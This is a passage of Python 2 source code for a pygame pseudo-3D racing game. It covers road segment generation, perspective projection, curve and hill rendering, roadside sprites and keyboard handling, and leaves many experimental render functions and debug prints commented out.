#i = int(math.ceil(pos / self.seg_len))
seg_n = len(self.segments)
i = (i + seg_n) % seg_n
return i
def rd_get_segs(self, whole=False):
if whole:
segs = self.segments
else:
segs = self.segments[:-self.seg_draw_n]
return segs
# #### geometry #### #
def geo_prjc_scale(self, d, zc):
if zc == 0.0:
return 1.0
else:
return d / zc
def xc_to_xp(self, xc, d, zc):
if zc == 0.0:
#xp = float('inf')
#xp = 2 ** 64
xp = xc
else:
xp = xc * (d / zc)
return xp
def yc_to_yp(self, yc, d, zc):
if zc == 0.0:
#yp = float('inf')
#yp = 2 ** 64
yp = yc
else:
yp = yc * (d / zc)
return yp
def xp_to_xs(self, xp, w):
#xs = w / 2.0 + w / 2.0 * xp
xs = w / 2.0 + xp
return xs
def yp_to_ys(self, yp, h):
#ys = h / 2.0 - h / 2.0 * yp
ys = h / 2.0 - yp
return ys
def rd_seg_init(self, a=500):
for n in range(a):
self.rd_seg_add(0.0, 0.0)
def rd_seg_add(self, curve=0.0, yw=0.0):
#print '+', curve, yw
n = len(self.segments)
#print n
if n % 2 == 0:
#if n % 4 == 0:
c = FP_COLORS['LIGHT']
#c = {'road': FP_COLOR_WHITE}
else:
c = FP_COLORS['DARK']
#c = {'road': FP_COLOR_BLACK}
seg = {
'index': n,
'p1': {'world': {'z': (n + 1) * self.seg_len,
'y': self.seg_lasy_y()},
'camera': {},
'screen': {}},
'p2': {'world': {'z': (n + 2) * self.seg_len,
'y': yw},
'camera': {},
'screen': {}},
'curve': curve,
'color': c,
'sprites': [],
'looped': 0,
}
self.segments.append(seg)
self.track_len = len(self.segments) * self.seg_len
#self.track_len = (len(self.segments) - self.seg_draw_n) * self.seg_len
def seg_lasy_y(self):
seg_n = len(self.segments)
if seg_n == 0:
return 0.0
else:
return self.segments[seg_n - 1]['p2']['world'].get('y', 0.0)
def rd_seg_init_rand(self, n=50):
#print 'rd_seg_init_rand', n
for i in range(n):
p = random.random()
#print p
rl = random.choice([1, -1])
enter = random.randint(10, 40)
hold = random.randint(10, 40)
leave = random.randint(10, 40)
if p < 0.3:
curve = 0.0
yw = 0.0
#elif p < 0.8:
# curve = 0.0
# yw = random.random() * 10.0
else:
curve = rl * random.random() * 6.0
yw = 0.0
self.add_road(enter, hold, leave, curve, yw)
def rd_seg_init_rand_2(self, n=50):
for i in range(n):
p = random.random()
#print p
rl = random.choice([1, -1])
if p < 0.35:
self.add_road(FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
rl * FP_ROAD['CURVE']['MEDIUM'])
elif p < 0.7:
self.add_road(FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
rl * FP_ROAD['CURVE']['EASY'])
else:
enter = random.randint(10, 100)
hold = random.randint(10, 100)
leave = random.randint(10, 100)
self.add_road(enter, hold, leave, 0.0, 0.0)
def rd_seg_init_rand_curve(self, n=5):
#print 'rd_seg_init_rand', n
for i in range(n):
rl = random.choice([1, -1])
enter = random.randint(10, 40)
hold = random.randint(10, 40)
leave = random.randint(10, 40)
curve = rl * random.random() * 8.0
yw = 0.0
self.add_road(enter, hold, leave, curve, yw)
def rd_start_seg_init(self, n=3):
seg_n = len(self.segments)
if seg_n == 0:
return
#self.segments[0]['color'] = FP_COLORS['START_Y']
#self.segments[2]['color'] = FP_COLORS['START_Y']
for i in range(n):
self.segments[i]['color'] = FP_COLORS['START_Y']
def rd_sprts_init_rand(self, n=None):
seg_n = len(self.segments)
if n is None:
#n = seg_n / 20
n = seg_n / random.randint(10, 30)
for i in range(n):
j = random.randint(10, seg_n - 10)
sprt = random.choice(FP_ROAD_SPRTS.keys())
s = {
'name': sprt,
'type': 1, # image / animate / ...
'obj': None, # need to create at render
##'x_i': None, # get real (random) x from x_pos
'x_i': random.randint(0, 4),
'score': FP_ROAD_SPRTS[sprt].get('score', 0),
}
self.segments[j]['sprites'].append(s)
def rd_sprts_del_all_objs(self):
for k, sprt in self.rd_sprt_objs.items():
#print k, sprt
self.disp_del(sprt)
del self.rd_sprt_objs[k]
def util_limit(self, value, mn, mx):
return max(mn, min(value, mx))
def util_accelerate(self, v, accel, dt):
return v + (accel * dt)
def util_increase(self, start, increment, mx): # with looping
result = start + increment
while (result >= mx):
result -= mx
while (result < 0):
result += mx
return result
def util_ease_in(self, a, b, percent):
return a + (b - a) * math.pow(percent, 2)
def util_ease_out(self, a, b, percent):
return a + (b - a) * (1 - math.pow(1 - percent, 2))
def util_ease_in_out(self, a, b, percent):
return a + (b - a) * ((-math.cos(percent * math.pi)/2) + 0.5)
def util_curve_percent_remaining(self, n, total):
return (n % total) / total
def add_road(self, enter, hold, leave, curve, yw=0.0):
#print enter, hold, leave, curve, yw
start_y = self.seg_lasy_y()
end_y = start_y + (int(yw) * self.seg_len)
total = enter + hold + leave
for n in range(enter):
self.rd_seg_add(self.util_ease_in(0, curve, float(n)/enter),
self.util_ease_out(start_y, end_y,
float(n)/total))
for n in range(hold):
self.rd_seg_add(curve,
self.util_ease_out(start_y, end_y,
(float(n)+enter)/total))
for n in range(leave):
self.rd_seg_add(self.util_ease_out(curve, 0, n/leave),
self.util_ease_out(start_y, end_y,
(float(n)+enter+hold)/total))
def add_curves(self):
self.add_road(FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
-FP_ROAD['CURVE']['EASY'])
self.add_road(FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['CURVE']['MEDIUM'])
self.add_road(FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['CURVE']['EASY'])
self.add_road(FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
-FP_ROAD['CURVE']['EASY'])
self.add_road(FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
-FP_ROAD['CURVE']['MEDIUM'])
self.add_road(FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
FP_ROAD['LENGTH']['MEDIUM'],
0.0)
def add_low_rolling_hills(self, num, height):
num = num or ROAD['LENGTH']['SHORT']
height = height or ROAD['HILL']['LOW']
self.add_road(num, num, num, 0, height/2.0)
self.add_road(num, num, num, 0, -height)
self.add_road(num, num, num, 0, height)
self.add_road(num, num, num, 0, 0)
self.add_road(num, num, num, 0, height/2.0)
self.add_road(num, num, num, 0, 0)
def rd_seg_get_cleared(self, segs=None):
if not segs:
segs = self.segments
segs_c = []
for seg in segs:
if not seg['sprites']:
segs_c.append(seg)
else:
seg_c = {}
for k, v in seg.items():
if k not in ['sprites']:
seg_c[k] = v
else:
seg_c[k] = []
for spr in seg['sprites']:
spr_n = {}
for sk, sv in spr.items():
if sk not in ['obj']:
spr_n[sk] = sv
else:
spr_n[sk] = None
seg_c[k].append(spr_n)
segs_c.append(seg_c)
return segs_c
def rd_seg_json_save(self, f):
sc = self.rd_seg_get_cleared(self.segments)
s = utils.json_dumps(sc)
with open(f, 'w') as fo:
fo.write(s)
def rd_seg_json_load(self, f):
with open(f, 'r') as fi:
s = fi.read()
segs = utils.json_loads(s)
return segs
def rd_seg_render__1_o(self):
"""straight"""
xc1 = self.road_w / 2 - self.player_x
xc2 = -self.road_w / 2 - self.player_x
xc3 = self.road_w / 2 - self.player_x
xc4 = -self.road_w / 2 - self.player_x
xcl1 = xc1 - self.lane_w
xcl2 = xc2 + self.lane_w
xcl3 = xc3 - self.lane_w
xcl4 = xc4 + self.lane_w
xcr1 = self.lane_w - self.player_x
xcr2 = -self.lane_w - self.player_x
xcr3 = self.lane_w - self.player_x
xcr4 = -self.lane_w - self.player_x
yc = self.camera_h
#print '=' * 80
#print 'self.position', self.position
for i, seg in enumerate(self.segments):
zw1 = seg['p1']['world']['z']
zw2 = seg['p2']['world']['z']
zc1 = zw1 - self.camera_z - self.position
zc2 = zw2 - self.camera_z - self.position
#zc1 = self.position - (zw1 - self.camera_z)
#zc2 = self.position - (zw2 - self.camera_z)
xp1 = self.xc_to_xp(xc1, self.d, zc1)
xs1 = self.xp_to_xs(xp1, self.w)
xp2 = self.xc_to_xp(xc2, self.d, zc1)
xs2 = self.xp_to_xs(xp2, self.w)
xp3 = self.xc_to_xp(xc3, self.d, zc2)
xs3 = self.xp_to_xs(xp3, self.w)
xp4 = self.xc_to_xp(xc4, self.d, zc2)
xs4 = self.xp_to_xs(xp4, self.w)
yp1 = self.yc_to_yp(yc, self.d, zc1)
ys1 = self.yp_to_ys(yp1, self.h)
ys2 = ys1
yp3 = self.yc_to_yp(yc, self.d, zc2)
ys3 = self.yp_to_ys(yp3, self.h)
ys4 = ys3
self.render_polygon(None,
0, ys1, self.w, ys2,
self.w, ys4, 0, ys3,
seg['color']['grass'])
self.render_polygon(None,
xs1, ys1, xs2, ys2,
xs4, ys4, xs3, ys3,
seg['color']['road'])
if 1:#i % 2 == 1:
xpl1 = self.xc_to_xp(xcl1, self.d, zc1)
xsl1 = self.xp_to_xs(xpl1, self.w)
xpl2 = self.xc_to_xp(xcl2, self.d, zc1)
xsl2 = self.xp_to_xs(xpl2, self.w)
xpl3 = self.xc_to_xp(xcl3, self.d, zc2)
xsl3 = self.xp_to_xs(xpl3, self.w)
xpl4 = self.xc_to_xp(xcl4, self.d, zc2)
xsl4 = self.xp_to_xs(xpl4, self.w)
self.render_polygon(None,
xs1, ys1, xsl1, ys1,
xsl3, ys3, xs3, ys3,
seg['color']['rumble'])
self.render_polygon(None,
xs2, ys2, xsl2, ys2,
xsl4, ys4, xs4, ys4,
seg['color']['rumble'])
xpr1 = self.xc_to_xp(xcr1, self.d, zc1)
xsr1 = self.xp_to_xs(xpr1, self.w)
xpr2 = self.xc_to_xp(xcr2, self.d, zc1)
xsr2 = self.xp_to_xs(xpr2, self.w)
xpr3 = self.xc_to_xp(xcr3, self.d, zc2)
xsr3 = self.xp_to_xs(xpr3, self.w)
xpr4 = self.xc_to_xp(xcr4, self.d, zc2)
xsr4 = self.xp_to_xs(xpr4, self.w)
self.render_polygon(None,
xsr1, ys1, xsr2, ys2,
xsr4, ys4, xsr3, ys3,
seg['color']['rumble'])
def rd_seg_render__2_o(self):
"""curve test 1"""
#theta_i = math.pi /180.0 * 0.1
#theta_i = math.pi /180.0 * 0.5
theta_i = math.pi /180.0 * 0.9
#theta_i = 0.0
xc1 = self.road_w / 2 - self.player_x
xc2 = -self.road_w / 2 - self.player_x
xc3 = self.road_w / 2 - self.player_x
xc4 = -self.road_w / 2 - self.player_x
yc = self.camera_h
print '=' * 80
print 'self.position', self.position
# <2>
seg_n = len(self.segments)
segbi = self.get_seg_base_i()
print 'segbi', segbi
# TODO: do at update
#dpx1 = self.seg_len * math.tan(theta_i)
#self.player_x -= dpx1
# <1>
#for i, seg in enumerate(self.segments):
# <2>
for i in range(self.seg_draw_n):
#'''
# <2>
si = (segbi + i) % seg_n
#print si
seg = self.segments[si]
#x#zw1 = (i+1)*self.seg_len
#zw2 = (i+2)*self.seg_len
#'''
# <1>
zw1 = seg['p1']['world']['z']
zw2 = seg['p2']['world']['z']
zc1 = zw1 - self.camera_z - self.position
zc2 = zw2 - self.camera_z - self.position
curve_d = 500
#x#xc1 = self.road_w / 2 - self.player_x - curve_d * i
#xc2 = -self.road_w / 2 - self.player_x - curve_d * i
#xc3 = self.road_w / 2 - self.player_x - curve_d * i
#xc4 = -self.road_w / 2 - self.player_x - curve_d * i
xp1 = self.xc_to_xp(xc1, self.d, zc1)
xs1 = self.xp_to_xs(xp1, self.w)
xp2 = self.xc_to_xp(xc2, self.d, zc1)
xs2 = self.xp_to_xs(xp2, self.w)
xp3 = self.xc_to_xp(xc3, self.d, zc2)
xs3 = self.xp_to_xs(xp3, self.w)
xp4 = self.xc_to_xp(xc4, self.d, zc2)
xs4 = self.xp_to_xs(xp4, self.w)
yp1 = self.yc_to_yp(yc, self.d, zc1)
ys1 = self.yp_to_ys(yp1, self.h)
ys2 = ys1
yp3 = self.yc_to_yp(yc, self.d, zc2)
ys3 = self.yp_to_ys(yp3, self.h)
ys4 = ys3
#'''
#if 1:
#if i < self.seg_draw_n / 2:
if i < self.seg_draw_n / 4:
theta1 = theta_i * i
theta2 = theta_i * (i + 1)
dx1 = self.seg_len * math.tan(theta1)
dx2 = self.seg_len * math.tan(theta2)
xs1 += dx1
xs2 += dx1
xs3 += dx2 #+ dx1
xs4 += dx2 #+ dx1
#'''
self.render_polygon(None,
0, ys1, self.w, ys2,
self.w, ys4, 0, ys3,
seg['color']['grass'])
self.render_polygon(None,
xs1, ys1, xs2, ys2,
xs4, ys4, xs3, ys3,
seg['color']['road'])
def rd_seg_render__3_o(self):
"""curve test 2: draw a circle"""
#theta_i = math.pi /180.0 * 0.1
#theta_i = math.pi /180.0 * 0.5
theta_i = math.pi /180.0 * 0.9
#theta_i = 0.0
#xc1 = self.road_w / 2 - self.player_x
#xc2 = -self.road_w / 2 - self.player_x
#xc3 = self.road_w / 2 - self.player_x
#xc4 = -self.road_w / 2 - self.player_x
# <3>
#engi = math.pi / 2.0 / self.seg_draw_n
engi = math.pi / 2.0 / 60#10#20
rad = self.road_w * 4#2
rad1 = rad + self.road_w / 2
rad2 = rad - self.road_w / 2
yc = self.camera_h
print '=' * 80
print 'self.position', self.position
# <2>
seg_n = len(self.segments)
segbi = self.get_seg_base_i()
print 'segbi', segbi
# TODO: do at update
#dpx1 = self.seg_len * math.tan(theta_i)
#self.player_x -= dpx1
# <1>
#for i, seg in enumerate(self.segments):
# <2>
for i in range(self.seg_draw_n):
#'''
# <2>
si = (segbi + i) % seg_n
#print si
seg = self.segments[si]
#x#zw1 = (i+1)*self.seg_len
#zw2 = (i+2)*self.seg_len
#'''
# <1>
zw1 = seg['p1']['world']['z']
zw2 = seg['p2']['world']['z']
zc1 = zw1 - self.camera_z - self.position
zc2 = zw2 - self.camera_z - self.position
curve_d = 500
#x#xc1 = self.road_w / 2 - self.player_x - curve_d * i
#xc2 = -self.road_w / 2 - self.player_x - curve_d * i
#xc3 = self.road_w / 2 - self.player_x - curve_d * i
#xc4 = -self.road_w / 2 - self.player_x - curve_d * i
# <3>
xx1 = rad1 * math.cos(engi * i)
xx2 = rad2 * math.cos(engi * i)
xx3 = rad1 * math.cos(engi * (i + 1))
xx4 = rad2 * math.cos(engi * (i + 1))
xc1 = (rad - xx1) - self.player_x
xc2 = (rad - xx2) - self.player_x
xc3 = (rad - xx3) - self.player_x
xc4 = (rad - xx4) - self.player_x
xp1 = self.xc_to_xp(xc1, self.d, zc1)
xs1 = self.xp_to_xs(xp1, self.w)
xp2 = self.xc_to_xp(xc2, self.d, zc1)
xs2 = self.xp_to_xs(xp2, self.w)
xp3 = self.xc_to_xp(xc3, self.d, zc2)
xs3 = self.xp_to_xs(xp3, self.w)
xp4 = self.xc_to_xp(xc4, self.d, zc2)
xs4 = self.xp_to_xs(xp4, self.w)
yp1 = self.yc_to_yp(yc, self.d, zc1)
ys1 = self.yp_to_ys(yp1, self.h)
ys2 = ys1
yp3 = self.yc_to_yp(yc, self.d, zc2)
ys3 = self.yp_to_ys(yp3, self.h)
ys4 = ys3
'''
#if 1:
#if i < self.seg_draw_n / 2:
if i < self.seg_draw_n / 4:
theta1 = theta_i * i
theta2 = theta_i * (i + 1)
dx1 = self.seg_len * math.tan(theta1)
dx2 = self.seg_len * math.tan(theta2)
xs1 += dx1
xs2 += dx1
xs3 += dx2 #+ dx1
xs4 += dx2 #+ dx1
'''
self.render_polygon(None,
0, ys1, self.w, ys2,
self.w, ys4, 0, ys3,
seg['color']['grass'])
self.render_polygon(None,
xs1, ys1, xs2, ys2,
xs4, ys4, xs3, ys3,
seg['color']['road'])
def rd_seg_render__4_o(self):
"""curve"""
#theta_i = math.pi /180.0 * 0.1
#theta_i = math.pi /180.0 * 0.5
theta_i = math.pi /180.0 * 0.9
#theta_i = 0.0
xc1 = self.road_w / 2 - self.player_x
xc2 = -self.road_w / 2 - self.player_x
xc3 = self.road_w / 2 - self.player_x
xc4 = -self.road_w / 2 - self.player_x
#xcl1 = xc1 - self.lane_w
#xcl2 = xc2 + self.lane_w
#xcl3 = xc3 - self.lane_w
#xcl4 = xc4 + self.lane_w
xcr1 = self.lane_w - self.player_x
xcr2 = -self.lane_w - self.player_x
xcr3 = self.lane_w - self.player_x
xcr4 = -self.lane_w - self.player_x
yc = self.camera_h
print '=' * 80
print 'self.position', self.position
# <2>
seg_n = len(self.segments)
segbi = self.get_seg_base_i()
print 'segbi', segbi
self.player_seg = self.segments[segbi]
b_curve = self.player_seg.get('curve', 0.0)
#b_percent = 0.5
b_percent = self.util_curve_percent_remaining(self.position,
self.seg_len)
dx_curve = - (b_curve * b_percent)
x_curve = 0
# <1>
#for i, seg in enumerate(self.segments):
# <2>
for i in range(self.seg_draw_n):
#'''
# <2>
si = (segbi + i) % seg_n
#print si
seg = self.segments[si]
#'''
'''
#x#
if seg['index'] < segbi:
zw1 = (i+1)*self.seg_len
zw2 = (i+2)*self.seg_len
else:
# <1>
zw1 = seg['p1']['world']['z']
zw2 = seg['p2']['world']['z']
'''
zw1 = seg['p1']['world']['z']
zw2 = seg['p2']['world']['z']
zc1 = zw1 - self.camera_z - self.position
zc2 = zw2 - self.camera_z - self.position
# for curve
xc1 = xc1 - x_curve
xc2 = xc2 - x_curve
xc3 = xc3 - x_curve - dx_curve
xc4 = xc4 - x_curve - dx_curve
xcl1 = xc1 - self.lane_w
xcl2 = xc2 + self.lane_w
xcl3 = xc3 - self.lane_w
xcl4 = xc4 + self.lane_w
xcr1 = xcr1 - x_curve
xcr2 = xcr2 - x_curve
xcr3 = xcr3 - x_curve - dx_curve
xcr4 = xcr4 - x_curve - dx_curve
x_curve = x_curve + dx_curve
dx_curve = dx_curve + seg.get('curve', 0.0)
xp1 = self.xc_to_xp(xc1, self.d, zc1)
xs1 = self.xp_to_xs(xp1, self.w)
xp2 = self.xc_to_xp(xc2, self.d, zc1)
xs2 = self.xp_to_xs(xp2, self.w)
xp3 = self.xc_to_xp(xc3, self.d, zc2)
xs3 = self.xp_to_xs(xp3, self.w)
xp4 = self.xc_to_xp(xc4, self.d, zc2)
xs4 = self.xp_to_xs(xp4, self.w)
yp1 = self.yc_to_yp(yc, self.d, zc1)
ys1 = self.yp_to_ys(yp1, self.h)
ys2 = ys1
yp3 = self.yc_to_yp(yc, self.d, zc2)
ys3 = self.yp_to_ys(yp3, self.h)
ys4 = ys3
'''
#if 1:
#if i < self.seg_draw_n / 2:
if i < self.seg_draw_n / 4:
theta1 = theta_i * i
theta2 = theta_i * (i + 1)
dx1 = self.seg_len * math.tan(theta1)
dx2 = self.seg_len * math.tan(theta2)
xs1 += dx1
xs2 += dx1
xs3 += dx2 #+ dx1
xs4 += dx2 #+ dx1
'''
self.render_polygon(None,
0, ys1, self.w, ys2,
self.w, ys4, 0, ys3,
seg['color']['grass'])
self.render_polygon(None,
xs1, ys1, xs2, ys2,
xs4, ys4, xs3, ys3,
seg['color']['road'])
if 1:#i % 2 == 1:
xpl1 = self.xc_to_xp(xcl1, self.d, zc1)
xsl1 = self.xp_to_xs(xpl1, self.w)
xpl2 = self.xc_to_xp(xcl2, self.d, zc1)
xsl2 = self.xp_to_xs(xpl2, self.w)
xpl3 = self.xc_to_xp(xcl3, self.d, zc2)
xsl3 = self.xp_to_xs(xpl3, self.w)
xpl4 = self.xc_to_xp(xcl4, self.d, zc2)
xsl4 = self.xp_to_xs(xpl4, self.w)
self.render_polygon(None,
xs1, ys1, xsl1, ys1,
xsl3, ys3, xs3, ys3,
seg['color']['rumble'])
self.render_polygon(None,
xs2, ys2, xsl2, ys2,
xsl4, ys4, xs4, ys4,
seg['color']['rumble'])
xpr1 = self.xc_to_xp(xcr1, self.d, zc1)
xsr1 = self.xp_to_xs(xpr1, self.w)
xpr2 = self.xc_to_xp(xcr2, self.d, zc1)
xsr2 = self.xp_to_xs(xpr2, self.w)
xpr3 = self.xc_to_xp(xcr3, self.d, zc2)
xsr3 = self.xp_to_xs(xpr3, self.w)
xpr4 = self.xc_to_xp(xcr4, self.d, zc2)
xsr4 = self.xp_to_xs(xpr4, self.w)
self.render_polygon(None,
xsr1, ys1, xsr2, ys2,
xsr4, ys4, xsr3, ys3,
seg['color']['rumble'])
def rd_seg_render(self):
"""curve"""
#theta_i = math.pi /180.0 * 0.1
#theta_i = math.pi /180.0 * 0.5
theta_i = math.pi /180.0 * 0.9
#theta_i = 0.0
xc1 = self.road_w / 2 - self.player_x
xc2 = -self.road_w / 2 - self.player_x
xc3 = self.road_w / 2 - self.player_x
xc4 = -self.road_w / 2 - self.player_x
#xcl1 = xc1 - self.lane_w
#xcl2 = xc2 + self.lane_w
#xcl3 = xc3 - self.lane_w
#xcl4 = xc4 + self.lane_w
xcr1 = self.lane_w - self.player_x
xcr2 = -self.lane_w - self.player_x
xcr3 = self.lane_w - self.player_x
xcr4 = -self.lane_w - self.player_x
yc = self.camera_h
#print '=' * 80
#print 'self.position', self.position
# <2>
seg_n = len(self.segments)
segbi = self.get_seg_base_i()
#print 'segbi', segbi, ' / ', seg_n
self.player_seg = self.segments[segbi]
self.base_seg = self.segments[(segbi + 2) % seg_n]
# for test
#self.base_seg['color'] = FP_COLORS['FINISH']
b_curve = self.player_seg.get('curve', 0.0)
#b_percent = 0.5
b_percent = self.util_curve_percent_remaining(self.position,
self.seg_len)
dx_curve = - (b_curve * b_percent)
x_curve = 0
#print 'b_curve', b_curve
#print 'world z', self.player_seg['p1']['world']['z']
#print 'world y', self.player_seg['p1']['world'].get('y', 0.0)
# clear the sprites cache
self.rd_sprt_cache = []
# <1>
#for i, seg in enumerate(self.segments):
# <2>
for i in range(self.seg_draw_n):
#'''
# <2>
si = (segbi + i) % seg_n
#print si
seg = self.segments[si]
#'''
'''
# for test
if i < 10:
print '>>> ', i
print 'curve', seg.get('curve', 0.0)
print 'world z', seg['p1']['world']['z']
print 'world y', seg['p1']['world'].get('y', 0.0)
#print '-' * 30
'''
'''
#x#
if seg['index'] < segbi:
zw1 = (i+1)*self.seg_len
zw2 = (i+2)*self.seg_len
else:
# <1>
zw1 = seg['p1']['world']['z']
zw2 = seg['p2']['world']['z']
'''
zw1 = (i+1)*self.seg_len
zw2 = (i+2)*self.seg_len
zc1 = zw1 - self.camera_z - (self.position % self.seg_len)
zc2 = zw2 - self.camera_z - (self.position % self.seg_len)
'''
#x#
zw1 = seg['p1']['world']['z']
zw2 = seg['p2']['world']['z']
zc1 = zw1 - self.camera_z - self.position
zc2 = zw2 - self.camera_z - self.position
'''
# for curve
xc1 = xc1 - x_curve
xc2 = xc2 - x_curve
xc3 = xc3 - x_curve - dx_curve
xc4 = xc4 - x_curve - dx_curve
xcl1 = xc1 - self.lane_w
xcl2 = xc2 + self.lane_w
xcl3 = xc3 - self.lane_w
xcl4 = xc4 + self.lane_w
xcr1 = xcr1 - x_curve
xcr2 = xcr2 - x_curve
xcr3 = xcr3 - x_curve - dx_curve
xcr4 = xcr4 - x_curve - dx_curve
x_curve = x_curve + dx_curve
dx_curve = dx_curve + seg.get('curve', 0.0)
# for hills
yw1 = seg['p1']['world'].get('y', 0.0)
yw2 = seg['p2']['world'].get('y', 0.0)
yc1 = yc - yw1
yc2 = yc - yw2
#print yw1, yw2
xp1 = self.xc_to_xp(xc1, self.d, zc1)
xs1 = self.xp_to_xs(xp1, self.w)
xp2 = self.xc_to_xp(xc2, self.d, zc1)
xs2 = self.xp_to_xs(xp2, self.w)
xp3 = self.xc_to_xp(xc3, self.d, zc2)
xs3 = self.xp_to_xs(xp3, self.w)
xp4 = self.xc_to_xp(xc4, self.d, zc2)
xs4 = self.xp_to_xs(xp4, self.w)
yp1 = self.yc_to_yp(yc1, self.d, zc1)
ys1 = self.yp_to_ys(yp1, self.h)
ys2 = ys1
yp3 = self.yc_to_yp(yc2, self.d, zc2)
ys3 = self.yp_to_ys(yp3, self.h)
ys4 = ys3
'''
# for test
if i < 10:
print xs1, ys1, xs2, ys2
print xs4, ys4, xs3, ys3
print '-' * 30
'''
# grass
self.render_polygon(None,
0, ys1, self.w, ys2,
self.w, ys4, 0, ys3,
seg['color']['grass'])
# road
self.render_polygon(None,
xs1, ys1, xs2, ys2,
xs4, ys4, xs3, ys3,
seg['color']['road'])
if 1:#i % 2 == 1:
xpl1 = self.xc_to_xp(xcl1, self.d, zc1)
xsl1 = self.xp_to_xs(xpl1, self.w)
xpl2 = self.xc_to_xp(xcl2, self.d, zc1)
xsl2 = self.xp_to_xs(xpl2, self.w)
xpl3 = self.xc_to_xp(xcl3, self.d, zc2)
xsl3 = self.xp_to_xs(xpl3, self.w)
xpl4 = self.xc_to_xp(xcl4, self.d, zc2)
xsl4 = self.xp_to_xs(xpl4, self.w)
self.render_polygon(None,
xs1, ys1, xsl1, ys1,
xsl3, ys3, xs3, ys3,
seg['color']['rumble'])
self.render_polygon(None,
xs2, ys2, xsl2, ys2,
xsl4, ys4, xs4, ys4,
seg['color']['rumble'])
xpr1 = self.xc_to_xp(xcr1, self.d, zc1)
xsr1 = self.xp_to_xs(xpr1, self.w)
xpr2 = self.xc_to_xp(xcr2, self.d, zc1)
xsr2 = self.xp_to_xs(xpr2, self.w)
xpr3 = self.xc_to_xp(xcr3, self.d, zc2)
xsr3 = self.xp_to_xs(xpr3, self.w)
xpr4 = self.xc_to_xp(xcr4, self.d, zc2)
xsr4 = self.xp_to_xs(xpr4, self.w)
self.render_polygon(None,
xsr1, ys1, xsr2, ys2,
xsr4, ys4, xsr3, ys3,
seg['color']['rumble'])
# for test
#self.pygm.draw.circle(self.surf, consts.BLUE,
# (int(xsr1), 116 - int(ys1)),
# 3, 0)
# render road sprites
# TODO: check if this seg is looped
seg_scale = self.geo_prjc_scale(self.d, zc1)
x_rnd = random.randint(1, self.road_w / 2 - 10) * seg_scale
#x_sprt = (xs1 + xs2) / 2.0
#y_sprt = (ys1 + ys3) / 2.0
x_dt = x_rnd * seg_scale
x_pos = [xsr1, xsr2,
(xsr1 + xsl1) / 2.0,
(xsr2 + xsl2) / 2.0,
xsl1, xsl2]
#x_sprt = xsr1
x_sprt = (xsr1 + xsl1) / 2.0
#x_sprt = random.choice(x_pos)
x_i = random.randint(0, len(x_pos) - 1) # NOTE: not used now !!
##x_i = 2
y_sprt = ys1
scale_sprt = seg_scale * 8.0#10.0#2.0
obj = self.rd_sprts_render(seg, x_pos, x_i, y_sprt, scale_sprt)
if obj:
self.rd_sprt_cache.append(obj)
# render the sprites with right order
for obj in self.rd_sprt_cache[::-1]:
self.disp_add(obj)
def render_polygon(self, ctx, x1, y1, x2, y2, x3, y3, x4, y4, color):
#d = 200#100#240#50#
#a = 60
#pnts = [[x1, y1], [x2, y2], [x3, y3], [x4, y4], [x1, y1]]
#pnts = [[x1, y1-d], [x2, y2-d], [x3, y3-d], [x4, y4-d], [x1, y1-d]]
#pnts = [[x1, y1+a], [x2, y2+a], [x3, y3+a], [x4, y4+a], [x1, y1+a]]
# reflect the y-
d = 116
pnts = [[x1, d-y1], [x2, d-y2], [x3, d-y3], [x4, d-y4], [x1, d-y1]]
c = utils.clr_from_str(color)
try:
self.pygm.draw.polygon(self.surf, c, pnts)
except Exception as e:
#print '-' * 60
pass
def rd_sprts_render(self, seg, x_pos, x_i, y, scale):
sprts = seg.get('sprites')
if not sprts:
return None
for i, info in enumerate(sprts):
sprt = info['name']
obj_k = str(seg['index']) + '_' + str(i) + '_' + sprt
obj = info.get('obj')
'''
# TODO: <1>
if not obj:
obj = FPSptRdSprts.create_by_img(FP_ROAD_SPRTS[sprt][0])
info['obj'] = obj
self.disp_add(obj)
'''
# <2>
if obj:
self.disp_del(obj)
# NOTE: objs will be deleted at rd_sprts_del_all_objs()
##del self.rd_sprt_objs[obj_k]
img = FP_ROAD_SPRTS[sprt]['imgs'][0]
obj = FPSptRdSprts.create_by_img(img)
# avoid: pygame.error: Width or height is too large
if scale > 500:
#print 'scale <1>', scale
pass
else:
try:
obj.scale(scale)
except:
#print 'scale <2>', scale
pass
x_i_saved = info.get('x_i')
#if not x_i_saved:
# info['x_i'] = x_i
# x_i_saved = x_i
obj.rect.top = 116 - y + 240 - obj.rect.height
obj.rect.left = x_pos[x_i_saved] - obj.rect.width / 2
#obj.scale(scale)
info['obj'] = obj
##self.disp_add(obj) # NOTE: render out here
self.rd_sprt_objs[obj_k] = obj # for reset to delete all
# NOTE: only show one
break
return obj
def handle_event(self, events, *args, **kwargs):
#print '>>> ', events
if not self.flag_check_event:
return events
else:
return self.check_key(events)
def key_to_di(self, k):
if k == self.pglc.K_UP:
return 0
elif k == self.pglc.K_RIGHT:
return 1
elif k == self.pglc.K_DOWN:
return 2
elif k == self.pglc.K_LEFT:
return 3
else:
return None
def key_to_di_b(self, k):
if k == self.pglc.K_f or k == self.pglc.K_j:
return 0
elif k == self.pglc.K_k:
return 1
elif k == self.pglc.K_SPACE or k == self.pglc.K_v or k == self.pglc.K_n:
return 2
elif k == self.pglc.K_d:
return 3
else:
return None
def check_key(self, events):
#print id(events)
r_events = []
e_keys_up = []
e_keys_dn = []
for event in events:
#print event
if event.type == self.pglc.KEYUP:
di = self.key_to_di(event.key)
if di is None:
di = self.key_to_di_b(event.key)
if di is not None:
e_keys_up.append(di)
else:
r_events.append(event)
elif event.type == self.pglc.KEYDOWN:
di = self.key_to_di(event.key)
if di is None:
